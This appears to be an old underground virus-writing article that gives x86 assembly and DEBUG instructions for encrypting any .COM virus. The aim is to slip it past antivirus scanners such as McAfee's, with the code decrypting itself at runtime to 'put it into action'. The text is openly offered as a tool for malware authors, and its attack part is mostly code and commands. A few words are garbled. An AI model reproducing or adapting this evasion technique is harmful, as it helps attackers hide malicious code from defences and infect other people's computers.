Protecting Your Virus from Evil Detectors
by Dr. Bloodmoney
Before learning assembler, I found the subject of virii to be about the most boring subject I could think of. But it caught my attention when I started to think about how I could sneak a virus (any virus) by a scanning program such as McAfee's. Here is a simple piece of code I came up with that can be attached to any virus that has been written in assembly language (in the .COM format). It allows you to encrypt a virus until runtime (i.e. until it is too Into).
Add the following code to the virus of your choice at the beginning of the program:
encryption_code: mov bx,offset start_of_virus encryption_loop: mov ah,[bx] ;Take first byte of virus and put in AH sub ah,01 ;This can be any integer up to FF mov [bx],ah ;Move changed byte back into virus code inc bx ;Move to next byte of virus cmp bx,offset end_virus ;Are we done yet? jb encryption_loop ;Nope, keep going nop ;Breakpoint for Debug start_of_virus: ' ' ' ;Viral code ' end_virus: nop ;Add this label and NOP to the end of the virus code end end encryption_codeAfter you compile the virus into .COM format, take it into Debug.
C:\> debug virus.comUse the "R" command to get your registers. Take particular not of CX. After the virus has been encrypted the actual size of the file might be different than CX. This is why we placed the NOP at the end of the file.
Now run the program setting a breakpoint at the first NOP (i.e. G 0111). This will just run the encryption portion of the code and exit back to Debug.
Unassemble the code with "U" to verify that the virus has been encrypted. You should notice a big change at this point.
Restore all registers to their original values, but first find the address of the NOP we placed at the end of the file. Put its address into CX.
Finally, change the "sub ah,01" in encryption_code: to "add ah,01".
Save the file ("W") and exit ("Q").
You now have a virus that will avoid detection until runtime. When run, the "add ah,01" restores the original viral code, putting it into action.
I hope you gained something from this article. I realize not everyone is familiar with assembler, but I hope I presented the material in a fashion that everyone could understand.